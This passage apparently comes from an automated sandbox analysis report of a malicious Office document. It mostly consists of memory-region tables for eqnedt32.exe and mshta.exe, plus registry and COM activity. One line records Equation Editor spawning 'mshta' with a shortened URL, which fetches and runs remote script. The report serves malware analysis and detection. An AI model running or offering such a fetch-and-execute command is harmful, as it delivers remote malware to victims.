| pagefile_0x00000000001a0000 | 0x001a0000 | 0x001a0fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x00000000001b0000 | 0x001b0000 | 0x001b1fff | Private Memory | rw |
|
|
|
- |
| locale.nls | 0x001c0000 | 0x00226fff | Memory Mapped File | r |
|
|
|
- |
| private_0x0000000000230000 | 0x00230000 | 0x00230fff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000240000 | 0x00240000 | 0x00240fff | Pagefile Backed Memory | rw |
|
|
|
- |
| pagefile_0x0000000000250000 | 0x00250000 | 0x00256fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000000260000 | 0x00260000 | 0x00261fff | Pagefile Backed Memory | rw |
|
|
|
- |
| pagefile_0x0000000000270000 | 0x00270000 | 0x00270fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x00000000002b0000 | 0x002b0000 | 0x0032ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000330000 | 0x00330000 | 0x0036ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000370000 | 0x00370000 | 0x003affff | Private Memory | rw |
|
|
|
- |
| private_0x00000000003b0000 | 0x003b0000 | 0x003effff | Private Memory | rw |
|
|
|
- |
| private_0x00000000003f0000 | 0x003f0000 | 0x003fffff | Private Memory | rw |
|
|
|
- |
| eqnedt32.exe | 0x00400000 | 0x0048dfff | Memory Mapped File | rwx |
|
|
|
- |
| private_0x0000000000490000 | 0x00490000 | 0x00490fff | Private Memory | rw |
|
|
|
- |
| pagefile_0x00000000004a0000 | 0x004a0000 | 0x0057efff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000000590000 | 0x00590000 | 0x0068ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000690000 | 0x00690000 | 0x00817fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000000820000 | 0x00820000 | 0x009a0fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x00000000009b0000 | 0x009b0000 | 0x01daffff | Pagefile Backed Memory | r |
|
|
|
- |
| sortdefault.nls | 0x01db0000 | 0x0207efff | Memory Mapped File | r |
|
|
|
- |
| pagefile_0x0000000002080000 | 0x02080000 | 0x02472fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000002480000 | 0x02480000 | 0x0257ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000002580000 | 0x02580000 | 0x025bffff | Private Memory | rw |
|
|
|
- |
| private_0x00000000025d0000 | 0x025d0000 | 0x025dffff | Private Memory | rw |
|
|
|
- |
| private_0x00000000025e0000 | 0x025e0000 | 0x026dffff | Private Memory | rw |
|
|
|
- |
| private_0x00000000026e0000 | 0x026e0000 | 0x0275ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000002780000 | 0x02780000 | 0x0278ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000002790000 | 0x02790000 | 0x02b8ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000002b90000 | 0x02b90000 | 0x02c8ffff | Private Memory | rw |
|
|
|
- |
| kernelbase.dll.mui | 0x02c90000 | 0x02d4ffff | Memory Mapped File | rw |
|
|
|
- |
| private_0x0000000002d60000 | 0x02d60000 | 0x02d9ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000002da0000 | 0x02da0000 | 0x02e9ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000003080000 | 0x03080000 | 0x030bffff | Private Memory | rw |
|
|
|
- |
| eeintl.dll | 0x3de20000 | 0x3de2dfff | Memory Mapped File | rwx |
|
|
|
- |
| private_0x000000006fe20000 | 0x6fe20000 | 0x6fe2ffff | Private Memory | rwx |
|
|
|
- |
| msi.dll | 0x74640000 | 0x7487ffff | Memory Mapped File | rwx |
|
|
|
- |
| rsaenh.dll | 0x750a0000 | 0x750dafff | Memory Mapped File | rwx |
|
|
|
- |
| cryptsp.dll | 0x750e0000 | 0x750f5fff | Memory Mapped File | rwx |
|
|
|
- |
| comctl32.dll | 0x75100000 | 0x75183fff | Memory Mapped File | rwx |
|
|
|
- |
| userenv.dll | 0x75190000 | 0x751a6fff | Memory Mapped File | rwx |
|
|
|
- |
| dwmapi.dll | 0x751f0000 | 0x75202fff | Memory Mapped File | rwx |
|
|
|
- |
| uxtheme.dll | 0x75210000 | 0x7528ffff | Memory Mapped File | rwx |
|
|
|
- |
| api-ms-win-core-synch-l1-2-0.dll | 0x75290000 | 0x75292fff | Memory Mapped File | rwx |
|
|
|
- |
| wow64cpu.dll | 0x752a0000 | 0x752a7fff | Memory Mapped File | rwx |
|
|
|
- |
| wow64win.dll | 0x752b0000 | 0x7530bfff | Memory Mapped File | rwx |
|
|
|
- |
| wow64.dll | 0x75310000 | 0x7534efff | Memory Mapped File | rwx |
|
|
|
- |
| rpcrtremote.dll | 0x75350000 | 0x7535dfff | Memory Mapped File | rwx |
|
|
|
- |
| c2r32.dll | 0x75360000 | 0x754d8fff | Memory Mapped File | rwx |
|
|
|
- |
| appvisvsubsystems32.dll | 0x754e0000 | 0x75697fff | Memory Mapped File | rwx |
|
|
|
- |
| profapi.dll | 0x75950000 | 0x7595afff | Memory Mapped File | rwx |
|
|
|
- |
| cryptbase.dll | 0x75970000 | 0x7597bfff | Memory Mapped File | rwx |
|
|
|
- |
| sspicli.dll | 0x75980000 | 0x759dffff | Memory Mapped File | rwx |
|
|
|
- |
| sechost.dll | 0x759e0000 | 0x759f8fff | Memory Mapped File | rwx |
|
|
|
- |
| msvcrt.dll | 0x75a10000 | 0x75abbfff | Memory Mapped File | rwx |
|
|
|
- |
| imm32.dll | 0x75c00000 | 0x75c5ffff | Memory Mapped File | rwx |
|
|
|
- |
| shlwapi.dll | 0x75c60000 | 0x75cb6fff | Memory Mapped File | rwx |
|
|
|
- |
| ole32.dll | 0x75cf0000 | 0x75e4bfff | Memory Mapped File | rwx |
|
|
|
- |
| msctf.dll | 0x75e50000 | 0x75f1bfff | Memory Mapped File | rwx |
|
|
|
- |
| kernelbase.dll | 0x75f40000 | 0x75f85fff | Memory Mapped File | rwx |
|
|
|
- |
| usp10.dll | 0x75fa0000 | 0x7603cfff | Memory Mapped File | rwx |
|
|
|
- |
| clbcatq.dll | 0x76040000 | 0x760c2fff | Memory Mapped File | rwx |
|
|
|
- |
| rpcrt4.dll | 0x760d0000 | 0x761bffff | Memory Mapped File | rwx |
|
|
|
- |
| kernel32.dll | 0x76220000 | 0x7632ffff | Memory Mapped File | rwx |
|
|
|
- |
| advapi32.dll | 0x76490000 | 0x7652ffff | Memory Mapped File | rwx |
|
|
|
- |
| oleaut32.dll | 0x76720000 | 0x767aefff | Memory Mapped File | rwx |
|
|
|
- |
| gdi32.dll | 0x76a70000 | 0x76afffff | Memory Mapped File | rwx |
|
|
|
- |
| shell32.dll | 0x76b00000 | 0x77749fff | Memory Mapped File | rwx |
|
|
|
- |
| lpk.dll | 0x77810000 | 0x77819fff | Memory Mapped File | rwx |
|
|
|
- |
| user32.dll | 0x77820000 | 0x7791ffff | Memory Mapped File | rwx |
|
|
|
- |
| private_0x0000000077a20000 | 0x77a20000 | 0x77b19fff | Private Memory | rwx |
|
|
|
- |
| private_0x0000000077b20000 | 0x77b20000 | 0x77c3efff | Private Memory | rwx |
|
|
|
- |
| ntdll.dll | 0x77c40000 | 0x77de8fff | Memory Mapped File | rwx |
|
|
|
- |
| ntdll.dll | 0x77e20000 | 0x77f9ffff | Memory Mapped File | rwx |
|
|
|
- |
| private_0x000000007efaa000 | 0x7efaa000 | 0x7efacfff | Private Memory | rw |
|
|
|
- |
| private_0x000000007efad000 | 0x7efad000 | 0x7efaffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x000000007efb0000 | 0x7efb0000 | 0x7efd2fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x000000007efd5000 | 0x7efd5000 | 0x7efd7fff | Private Memory | rw |
|
|
|
- |
| private_0x000000007efd8000 | 0x7efd8000 | 0x7efdafff | Private Memory | rw |
|
|
|
- |
| private_0x000000007efdb000 | 0x7efdb000 | 0x7efddfff | Private Memory | rw |
|
|
|
- |
| private_0x000000007efde000 | 0x7efde000 | 0x7efdefff | Private Memory | rw |
|
|
|
- |
| private_0x000000007efdf000 | 0x7efdf000 | 0x7efdffff | Private Memory | rw |
|
|
|
- |
| private_0x000000007efe0000 | 0x7efe0000 | 0x7ffdffff | Private Memory | r |
|
|
|
- |
| pagefile_0x000000007efe0000 | 0x7efe0000 | 0x7f0dffff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x000000007f0e0000 | 0x7f0e0000 | 0x7ffdffff | Private Memory | r |
|
|
|
- |
| private_0x000000007ffe0000 | 0x7ffe0000 | 0x7ffeffff | Private Memory | r |
|
|
|
- |
| private_0x000000007fff0000 | 0x7fff0000 | 0x7fffffeffff | Private Memory | r |
|
|
|
- |
Process #10: mshta.exe
173
0
| Information | Value |
|---|---|
| ID | #10 |
| File Name | c:\windows\syswow64\mshta.exe |
| Command Line | mshta https://urlz.fr/8gYe &AAAAAAAAAAAAAAAAC |
| Initial Working Directory | C:\Program Files\Microsoft Office\Root\Office16\ |
| Monitor | Start Time: 00:01:21, Reason: Child Process |
| Unmonitor | End Time: 00:01:24, Reason: Self Terminated |
| Monitor Duration | 00:00:03 |
OS Process Information
| Information | Value |
|---|---|
| PID | 0x9ac |
| Parent PID | 0x894 (c:\program files\microsoft office\root\vfs\programfilescommonx64\microsoft shared\equation\eqnedt32.exe) |
| Is Created or Modified Executable |
|
| Integrity Level | Medium |
| Username | YKYD69Q\aETAdzjz |
| Enabled Privileges | SeChangeNotifyPrivilege |
| Thread IDs |
0x
848
0x
524
0x
554
0x
5EC
0x
5E8
0x
348
0x
578
0x
664
0x
668
0x
90
0x
214
0x
564
0x
464
|
Region
| Name | Start VA | End VA | Type | Permissions | Monitored | Dumped | YARA | Actions |
|---|---|---|---|---|---|---|---|---|
| private_0x0000000000010000 | 0x00010000 | 0x0002ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000010000 | 0x00010000 | 0x0001ffff | Pagefile Backed Memory | rw |
|
|
|
- |
| pagefile_0x0000000000020000 | 0x00020000 | 0x00026fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000000030000 | 0x00030000 | 0x00031fff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000030000 | 0x00030000 | 0x00031fff | Pagefile Backed Memory | rw |
|
|
|
- |
| apisetschema.dll | 0x00040000 | 0x00040fff | Memory Mapped File | rwx |
|
|
|
- |
| pagefile_0x0000000000050000 | 0x00050000 | 0x00053fff | Pagefile Backed Memory | r |
|
|
|
- |
| mshta.exe | 0x00060000 | 0x0006efff | Memory Mapped File | rwx |
|
|
|
- |
| pagefile_0x0000000000070000 | 0x00070000 | 0x00070fff | Pagefile Backed Memory | r |
|
|
|
- |
| mshta.exe.mui | 0x00080000 | 0x00080fff | Memory Mapped File | rw |
|
|
|
- |
| private_0x0000000000090000 | 0x00090000 | 0x00090fff | Private Memory | rw |
|
|
|
- |
| private_0x00000000000a0000 | 0x000a0000 | 0x000a0fff | Private Memory | rw |
|
|
|
- |
| private_0x00000000000b0000 | 0x000b0000 | 0x0012ffff | Private Memory | rw |
|
|
|
- |
| locale.nls | 0x00130000 | 0x00196fff | Memory Mapped File | r |
|
|
|
- |
| private_0x00000000001a0000 | 0x001a0000 | 0x001dffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x00000000001e0000 | 0x001e0000 | 0x001e0fff | Pagefile Backed Memory | rw |
|
|
|
- |
| private_0x00000000001f0000 | 0x001f0000 | 0x001f0fff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000200000 | 0x00200000 | 0x00200fff | Pagefile Backed Memory | rw |
|
|
|
- |
| private_0x0000000000210000 | 0x00210000 | 0x0024ffff | Private Memory | rw |
|
|
|
- |
| index.dat | 0x00250000 | 0x0025bfff | Memory Mapped File | rw |
|
|
|
- |
| index.dat | 0x00260000 | 0x00267fff | Memory Mapped File | rw |
|
|
|
- |
| index.dat | 0x00270000 | 0x0027ffff | Memory Mapped File | rw |
|
|
|
- |
| index.dat | 0x00280000 | 0x002bffff | Memory Mapped File | rw |
|
|
|
- |
| private_0x00000000002c0000 | 0x002c0000 | 0x003bffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x00000000003c0000 | 0x003c0000 | 0x003c0fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x00000000003d0000 | 0x003d0000 | 0x003d0fff | Pagefile Backed Memory | r |
|
|
|
- |
| windowsshell.manifest | 0x003e0000 | 0x003e0fff | Memory Mapped File | r |
|
|
|
- |
| pagefile_0x00000000003e0000 | 0x003e0000 | 0x003e0fff | Pagefile Backed Memory | rw |
|
|
|
- |
| private_0x00000000003f0000 | 0x003f0000 | 0x004effff | Private Memory | rw |
|
|
|
- |
| private_0x00000000004f0000 | 0x004f0000 | 0x0059ffff | Private Memory | rw |
|
|
|
- |
| private_0x00000000004f0000 | 0x004f0000 | 0x0057ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x00000000004f0000 | 0x004f0000 | 0x004f1fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000000500000 | 0x00500000 | 0x00501fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000000510000 | 0x00510000 | 0x00511fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000000520000 | 0x00520000 | 0x00520fff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000520000 | 0x00520000 | 0x00520fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000000540000 | 0x00540000 | 0x0057ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000590000 | 0x00590000 | 0x0059ffff | Private Memory | rw |
|
|
|
- |
| private_0x00000000005a0000 | 0x005a0000 | 0x005bffff | Private Memory | rw |
|
|
|
- |
| private_0x00000000005d0000 | 0x005d0000 | 0x005dffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x00000000005e0000 | 0x005e0000 | 0x00767fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000000770000 | 0x00770000 | 0x008f0fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000000900000 | 0x00900000 | 0x01cfffff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000001d00000 | 0x01d00000 | 0x01ddefff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000001de0000 | 0x01de0000 | 0x01e8ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000001de0000 | 0x01de0000 | 0x01e2ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000001e00000 | 0x01e00000 | 0x01e3ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000001e50000 | 0x01e50000 | 0x01e8ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000001ee0000 | 0x01ee0000 | 0x01fdffff | Private Memory | rw |
|
|
|
- |
| sortdefault.nls | 0x01fe0000 | 0x022aefff | Memory Mapped File | r |
|
|
|
- |
| pagefile_0x00000000022b0000 | 0x022b0000 | 0x025f2fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000002600000 | 0x02600000 | 0x027cffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000002600000 | 0x02600000 | 0x0263ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000002640000 | 0x02640000 | 0x0273ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000002790000 | 0x02790000 | 0x027cffff | Private Memory | rw |
|
|
|
- |
| private_0x00000000027d0000 | 0x027d0000 | 0x0280ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000002810000 | 0x02810000 | 0x0284ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000002850000 | 0x02850000 | 0x028cffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000002900000 | 0x02900000 | 0x0293ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000002950000 | 0x02950000 | 0x02a4ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000002a60000 | 0x02a60000 | 0x02a9ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000002af0000 | 0x02af0000 | 0x02beffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000002bf0000 | 0x02bf0000 | 0x02deffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000002bf0000 | 0x02bf0000 | 0x02d3ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000002bf0000 | 0x02bf0000 | 0x02ceffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000002d30000 | 0x02d30000 | 0x02d3ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000002de0000 | 0x02de0000 | 0x02deffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000002e30000 | 0x02e30000 | 0x02e6ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000002f30000 | 0x02f30000 | 0x0302ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000003040000 | 0x03040000 | 0x0313ffff | Private Memory | rw |
|
|
|
- |
| private_0x00000000031a0000 | 0x031a0000 | 0x0329ffff | Private Memory | rw |
|
|
|
- |
| private_0x00000000033c0000 | 0x033c0000 | 0x034bffff | Private Memory | rw |
|
|
|
- |
| mshtml.dll | 0x73ed0000 | 0x74486fff | Memory Mapped File | rwx |
|
|
|
- |
| oleacc.dll | 0x746c0000 | 0x746fbfff | Memory Mapped File | rwx |
|
|
|
- |
| msimtf.dll | 0x74700000 | 0x7470afff | Memory Mapped File | rwx |
|
|
|
- |
| schannel.dll | 0x74710000 | 0x74749fff | Memory Mapped File | rwx |
|
|
|
- |
| ntmarta.dll | 0x747d0000 | 0x747f0fff | Memory Mapped File | rwx |
|
|
|
- |
| msls31.dll | 0x74800000 | 0x74829fff | Memory Mapped File | rwx |
|
|
|
- |
| netprofm.dll | 0x74900000 | 0x74959fff | Memory Mapped File | rwx |
|
|
|
- |
| comctl32.dll | 0x74960000 | 0x74afdfff | Memory Mapped File | rwx |
|
|
|
- |
| rasadhlp.dll | 0x74bd0000 | 0x74bd5fff | Memory Mapped File | rwx |
|
|
|
- |
| nlaapi.dll | 0x74be0000 | 0x74beffff | Memory Mapped File | rwx |
|
|
|
- |
| wshtcpip.dll | 0x74bf0000 | 0x74bf4fff | Memory Mapped File | rwx |
|
|
|
- |
| mswsock.dll | 0x74c00000 | 0x74c3bfff | Memory Mapped File | rwx |
|
|
|
- |
| sensapi.dll | 0x74c40000 | 0x74c45fff | Memory Mapped File | rwx |
|
|
|
- |
| rtutils.dll | 0x74c50000 | 0x74c5cfff | Memory Mapped File | rwx |
|
|
|
- |
| rasman.dll | 0x74c60000 | 0x74c74fff | Memory Mapped File | rwx |
|
|
|
- |
| rasapi32.dll | 0x74c80000 | 0x74cd1fff | Memory Mapped File | rwx |
|
|
|
- |
| iphlpapi.dll | 0x74ce0000 | 0x74cfbfff | Memory Mapped File | rwx |
|
|
|
- |
| dnsapi.dll | 0x74d00000 | 0x74d43fff | Memory Mapped File | rwx |
|
|
|
- |
| winnsi.dll | 0x74f80000 | 0x74f86fff | Memory Mapped File | rwx |
|
|
|
- |
| version.dll | 0x74f90000 | 0x74f98fff | Memory Mapped File | rwx |
|
|
|
- |
| userenv.dll | 0x75190000 | 0x751a6fff | Memory Mapped File | rwx |
|
|
|
- |
| dwmapi.dll | 0x751f0000 | 0x75202fff | Memory Mapped File | rwx |
|
|
|
- |
| uxtheme.dll | 0x75210000 | 0x7528ffff | Memory Mapped File | rwx |
|
|
|
- |
| wow64cpu.dll | 0x752a0000 | 0x752a7fff | Memory Mapped File | rwx |
|
|
|
- |
| wow64win.dll | 0x752b0000 | 0x7530bfff | Memory Mapped File | rwx |
|
|
|
- |
| wow64.dll | 0x75310000 | 0x7534efff | Memory Mapped File | rwx |
|
|
|
- |
| profapi.dll | 0x75950000 | 0x7595afff | Memory Mapped File | rwx |
|
|
|
- |
| cryptbase.dll | 0x75970000 | 0x7597bfff | Memory Mapped File | rwx |
|
|
|
- |
| sspicli.dll | 0x75980000 | 0x759dffff | Memory Mapped File | rwx |
|
|
|
- |
| sechost.dll | 0x759e0000 | 0x759f8fff | Memory Mapped File | rwx |
|
|
|
- |
| normaliz.dll | 0x75a00000 | 0x75a02fff | Memory Mapped File | rwx |
|
|
|
- |
| msvcrt.dll | 0x75a10000 | 0x75abbfff | Memory Mapped File | rwx |
|
|
|
- |
| urlmon.dll | 0x75ac0000 | 0x75bf5fff | Memory Mapped File | rwx |
|
|
|
- |
| imm32.dll | 0x75c00000 | 0x75c5ffff | Memory Mapped File | rwx |
|
|
|
- |
| shlwapi.dll | 0x75c60000 | 0x75cb6fff | Memory Mapped File | rwx |
|
|
|
- |
| wintrust.dll | 0x75cc0000 | 0x75cecfff | Memory Mapped File | rwx |
|
|
|
- |
| ole32.dll | 0x75cf0000 | 0x75e4bfff | Memory Mapped File | rwx |
|
|
|
- |
| msctf.dll | 0x75e50000 | 0x75f1bfff | Memory Mapped File | rwx |
|
|
|
- |
| kernelbase.dll | 0x75f40000 | 0x75f85fff | Memory Mapped File | rwx |
|
|
|
- |
| psapi.dll | 0x75f90000 | 0x75f94fff | Memory Mapped File | rwx |
|
|
|
- |
| usp10.dll | 0x75fa0000 | 0x7603cfff | Memory Mapped File | rwx |
|
|
|
- |
| clbcatq.dll | 0x76040000 | 0x760c2fff | Memory Mapped File | rwx |
|
|
|
- |
| rpcrt4.dll | 0x760d0000 | 0x761bffff | Memory Mapped File | rwx |
|
|
|
- |
| kernel32.dll | 0x76220000 | 0x7632ffff | Memory Mapped File | rwx |
|
|
|
- |
| crypt32.dll | 0x76330000 | 0x7644cfff | Memory Mapped File | rwx |
|
|
|
- |
| ws2_32.dll | 0x76450000 | 0x76484fff | Memory Mapped File | rwx |
|
|
|
- |
| advapi32.dll | 0x76490000 | 0x7652ffff | Memory Mapped File | rwx |
|
|
|
- |
| wldap32.dll | 0x76530000 | 0x76574fff | Memory Mapped File | rwx |
|
|
|
- |
| oleaut32.dll | 0x76720000 | 0x767aefff | Memory Mapped File | rwx |
|
|
|
- |
| iertutil.dll | 0x767e0000 | 0x769dafff | Memory Mapped File | rwx |
|
|
|
- |
| gdi32.dll | 0x76a70000 | 0x76afffff | Memory Mapped File | rwx |
|
|
|
- |
| shell32.dll | 0x76b00000 | 0x77749fff | Memory Mapped File | rwx |
|
|
|
- |
| msasn1.dll | 0x77800000 | 0x7780bfff | Memory Mapped File | rwx |
|
|
|
- |
| lpk.dll | 0x77810000 | 0x77819fff | Memory Mapped File | rwx |
|
|
|
- |
| user32.dll | 0x77820000 | 0x7791ffff | Memory Mapped File | rwx |
|
|
|
- |
| wininet.dll | 0x77920000 | 0x77a14fff | Memory Mapped File | rwx |
|
|
|
- |
| private_0x0000000077a20000 | 0x77a20000 | 0x77b19fff | Private Memory | rwx |
|
|
|
- |
| private_0x0000000077b20000 | 0x77b20000 | 0x77c3efff | Private Memory | rwx |
|
|
|
- |
| ntdll.dll | 0x77c40000 | 0x77de8fff | Memory Mapped File | rwx |
|
|
|
- |
| nsi.dll | 0x77df0000 | 0x77df5fff | Memory Mapped File | rwx |
|
|
|
- |
| ntdll.dll | 0x77e20000 | 0x77f9ffff | Memory Mapped File | rwx |
|
|
|
- |
| private_0x000000007ef9e000 | 0x7ef9e000 | 0x7efa0fff | Private Memory | rw |
|
|
|
- |
| private_0x000000007efa1000 | 0x7efa1000 | 0x7efa3fff | Private Memory | rw |
|
|
|
- |
| private_0x000000007efa4000 | 0x7efa4000 | 0x7efa6fff | Private Memory | rw |
|
|
|
- |
| private_0x000000007efa7000 | 0x7efa7000 | 0x7efa9fff | Private Memory | rw |
|
|
|
- |
| private_0x000000007efaa000 | 0x7efaa000 | 0x7efacfff | Private Memory | rw |
|
|
|
- |
| private_0x000000007efad000 | 0x7efad000 | 0x7efaffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x000000007efb0000 | 0x7efb0000 | 0x7efd2fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x000000007efd5000 | 0x7efd5000 | 0x7efd7fff | Private Memory | rw |
|
|
|
- |
| private_0x000000007efd8000 | 0x7efd8000 | 0x7efdafff | Private Memory | rw |
|
|
|
- |
| private_0x000000007efdb000 | 0x7efdb000 | 0x7efddfff | Private Memory | rw |
|
|
|
- |
| private_0x000000007efde000 | 0x7efde000 | 0x7efdefff | Private Memory | rw |
|
|
|
- |
| private_0x000000007efdf000 | 0x7efdf000 | 0x7efdffff | Private Memory | rw |
|
|
|
- |
| private_0x000000007efe0000 | 0x7efe0000 | 0x7ffdffff | Private Memory | r |
|
|
|
- |
| pagefile_0x000000007efe0000 | 0x7efe0000 | 0x7f0dffff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x000000007f0e0000 | 0x7f0e0000 | 0x7ffdffff | Private Memory | r |
|
|
|
- |
| private_0x000000007ffe0000 | 0x7ffe0000 | 0x7ffeffff | Private Memory | r |
|
|
|
- |
| private_0x000000007fff0000 | 0x7fff0000 | 0x7fffffeffff | Private Memory | r |
|
|
|
- |
|
For performance reasons, the remaining 51 entries are omitted.
The remaining entries can be found in flog.txt. |
||||||||
Host Behavior
COM (2)
| Operation | Class | Interface | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|---|
| Create | 3050F5C8-98B5-11CF-BB82-00AA00BDCE0B | 00000000-0000-0000-C000-000000000046 | cls_context = CLSCTX_INPROC_SERVER |
|
1 | |
| Create | Shell.Application | IClassFactory | cls_context = CLSCTX_INPROC_SERVER, CLSCTX_LOCAL_SERVER, CLSCTX_REMOTE_SERVER |
|
1 |
File (4)
| Operation | Filename | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Open | STD_INPUT_HANDLE | - |
|
1 | |
| Open | STD_OUTPUT_HANDLE | - |
|
1 | |
| Open | STD_ERROR_HANDLE | - |
|
1 | |
| Open Mapping | #MSHTML#PERF#000009AC | desired_access = FILE_MAP_WRITE |
|
1 |
Registry (29)
| Operation | Key | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Open Key | HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Main\FeatureControl | - |
|
1 | |
| Open Key | HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FeatureControl | - |
|
1 | |
| Open Key | HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_CLEANUP_AT_FLS | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_CLEANUP_AT_FLS | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Main\FeatureControl | - |
|
1 | |
| Open Key | HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FeatureControl | - |
|
1 | |
| Open Key | HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_MANAGE_SCRIPT_CIRCULAR_REFS | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_MANAGE_SCRIPT_CIRCULAR_REFS | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Main\FeatureControl | - |
|
1 | |
| Open Key | HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FeatureControl | - |
|
1 | |
| Open Key | HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_XSSFILTER | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_XSSFILTER | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Main\FeatureControl | - |
|
1 | |
| Open Key | HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FeatureControl | - |
|
1 | |
| Open Key | HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_SHOW_FAILED_CONNECT_CONTENT_KB942615 | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_SHOW_FAILED_CONNECT_CONTENT_KB942615 | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Main\FeatureControl | - |
|
1 | |
| Open Key | HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FeatureControl | - |
|
1 | |
| Open Key | HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_CODEPAGE_INHERIT | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_CODEPAGE_INHERIT | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Main\FeatureControl | - |
|
1 | |
| Open Key | HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FeatureControl | - |
|
1 | |
| Open Key | HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_CUSTOM_IMAGE_MIME_TYPES_KB910561 | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_CUSTOM_IMAGE_MIME_TYPES_KB910561 | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Main\FeatureControl | - |
|
1 | |
| Open Key | HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FeatureControl | - |
|
1 | |
